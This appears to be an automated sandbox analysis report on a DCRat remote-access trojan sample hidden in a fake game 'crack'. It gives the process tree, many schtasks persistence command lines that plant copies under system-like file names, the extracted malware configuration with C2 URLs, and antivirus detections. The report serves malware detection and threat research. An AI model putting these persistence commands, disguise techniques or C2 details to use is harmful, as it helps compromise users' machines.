Windows Analysis Report
RFAwChXSve.exe

Overview

General Information

Sample name: RFAwChXSve.exe (renamed because original name is a hash value)
Original sample name: 47CA55CDB30DB720D739BFB73504B928.exe
Analysis ID: 1449910
MD5: 47ca55cdb30db720d739bfb73504b928
SHA1: d0292acd8f617ce49e1830bd47e108c4c3f833e2
SHA256: 4cc156f578777710f3ce0c217664b9830ddfcab407f0c6de0cae10d5501d1ca1
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates files with lurking names (e.g. Crack.exe)
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RFAwChXSve.exe (PID: 6824 cmdline: "C:\Users\user\Desktop\RFAwChXSve.exe" MD5: 47CA55CDB30DB720D739BFB73504B928)
    • RobloxPlayerLauncher.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe" MD5: 938199CA646378B696716037AFC964BA)
      • RobloxPlayerLauncher.exe (PID: 7196 cmdline: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4 MD5: 938199CA646378B696716037AFC964BA)
    • AkrienPremiumCrackByHurminka.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe" MD5: C4546882C186DC99C68501D0DB7FBB21)
      • AkrienPremiumCrack.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe" MD5: 830511D481D3B0D9E73F8475159EBEE3)
      • AkrienCrack.exe (PID: 7308 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" MD5: F01B45525A3718CEEDFCC788392DFE50)
        • wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • refdhcp.exe (PID: 7660 cmdline: "C:\Browserfont\refdhcp.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
              • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7756 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7772 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7836 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7904 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7920 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7952 cmdline: schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8000 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8016 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8036 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8092 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 6880 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 3288 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • RDMwYUvZPK.exe (PID: 1068 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
  • RDMwYUvZPK.exe (PID: 5904 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
  • cleanup
{"SCRT": "{\"V\":\")\",\"T\":\"%\",\"0\":\"~\",\"i\":\"`\",\"I\":\"-\",\"1\":\"@\",\"c\":\"(\",\"N\":\",\",\"h\":\"<\",\"s\":\"#\",\"M\":\"^\",\"E\":\".\",\"6\":\"|\",\"3\":\"*\",\"L\":\">\",\"w\":\"!\",\"4\":\"$\",\"k\":\"_\",\"S\":\" \",\"m\":\";\",\"J\":\"&\"}", "PCRT": "{\"I\":\"$\",\"=\":\"~\",\"i\":\"`\",\"c\":\"^\",\"M\":\"(\",\"0\":\";\",\"y\":\"|\",\"X\":\"*\",\"S\":\"%\",\"6\":\".\",\"j\":\"&\",\"x\":\"!\",\"p\":\"@\",\"w\":\">\",\"b\":\",\",\"l\":\")\",\"f\":\" \",\"Q\":\"-\",\"e\":\"<\",\"D\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DcQgTA363OTSb28k0qRq", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "H2": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "T": "0"}
Source | Rule | Description | Author | Strings
00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security |
00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security |
00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

            Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Browserfont\refdhcp.exe, ProcessId: 7660, TargetFilename: C:\Browserfont\services.exe
            Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\RFAwChXSve.exe, ProcessId: 6824, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
            Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, ParentProcessId: 7308, ParentProcessName: AkrienCrack.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , ProcessId: 7356, ProcessName: wscript.exe
            No Snort rule has matched

            AV Detection

            Source: RFAwChXSve.exe, Avira: detected
            Source: http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAz, Avira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru, Avira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyz, Avira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/@=MGZkZzNmlTN, Avira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/, Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Browserfont\RDMwYUvZPK.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\ilq5gxa6sOuB.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe, Avira: detection malicious, Label: TR/ATRAPS.Gen2
            Source: C:\Browserfont\services.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\Registry.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\AkrienAntiLeak\SgrmBroker.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Public\Videos\cmd.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\refdhcp.exe, Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"SCRT": "{\"V\":\")\",\"T\":\"%\",\"0\":\"~\",\"i\":\"`\",\"I\":\"-\",\"1\":\"@\",\"c\":\"(\",\"N\":\",\",\"h\":\"<\",\"s\":\"#\",\"M\":\"^\",\"E\":\".\",\"6\":\"|\",\"3\":\"*\",\"L\":\">\",\"w\":\"!\",\"4\":\"$\",\"k\":\"_\",\"S\":\" \",\"m\":\";\",\"J\":\"&\"}", "PCRT": "{\"I\":\"$\",\"=\":\"~\",\"i\":\"`\",\"c\":\"^\",\"M\":\"(\",\"0\":\";\",\"y\":\"|\",\"X\":\"*\",\"S\":\"%\",\"6\":\".\",\"j\":\"&\",\"x\":\"!\",\"p\":\"@\",\"w\":\">\",\"b\":\",\",\"l\":\")\",\"f\":\" \",\"Q\":\"-\",\"e\":\"<\",\"D\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DcQgTA363OTSb28k0qRq", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "H2": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "T": "0"}
            Source: http://a0985805.xsph.ru, Virustotal: Detection: 7%
            Source: http://a0985805.xsph.ru/, Virustotal: Detection: 7%
            Source: C:\AkrienAntiLeak\SgrmBroker.exe, ReversingLabs: Detection: 87%
            Source: C:\Browserfont\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Browserfont\Registry.exe, ReversingLabs: Detection: 87%
            Source: C:\Browserfont\refdhcp.exe, ReversingLabs: Detection: 87%
            Source: C:\Browserfont\services.exe, ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\ProgramData\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Recovery\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Users\Default\Saved Games\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Users\Public\Videos\cmd.exe, ReversingLabs: Detection: 87%
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, ReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe, ReversingLabs: Detection: 52%
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe, ReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Users\user\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe, ReversingLabs: Detection: 87%
            Source: C:\Windows\en-US\RuntimeBroker.exe, ReversingLabs: Detection: 87%
            Source: RFAwChXSve.exe, ReversingLabs: Detection: 84%
            Source: RFAwChXSve.exe, Virustotal: Detection: 93%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 92.0% probability
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, Joe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe, Joe Sandbox ML: detected
            Source: C:\Browserfont\services.exe, Joe Sandbox ML: detected
            Source: C:\Browserfont\Registry.exe, Joe Sandbox ML: detected
            Source: C:\AkrienAntiLeak\SgrmBroker.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe, Joe Sandbox ML: detected
            Source: C:\Users\Public\Videos\cmd.exe, Joe Sandbox ML: detected
            Source: C:\Browserfont\refdhcp.exe, Joe Sandbox ML: detected
            Source: RFAwChXSve.exe, Joe Sandbox ML: detected
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----
            Source: RFAwChXSve.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\version-d6abc3b106a04c5c-rbxInstallerPkgManifest[1].txt
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AkrienPremiumCrackByHurminka.exe, 00000002.00000003.1761671972.0000000003891000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000003.1766614314.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe, 00000005.00000003.1765791785.0000000006241000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000000.1762362221.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe.2.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_nbsninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\BootstrapperClient\BootstrapperClient.pdb source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: .pdb /MT source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, Code function: 5_2_00B4A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00B4A5F4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, Code function: 5_2_00B5B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_00B5B8E0
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user\AppData
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Browserfont\refdhcp.exe, File opened: C:\Users\user\AppData\Local

            Networking

            Source: Malware configuration extractor, URLs: http://a0985805.xsph.ru/@=MGZkZzNmlTN
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://a0985805.xsph.ru
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://a0985805.xsph.ru/
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyz
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAz
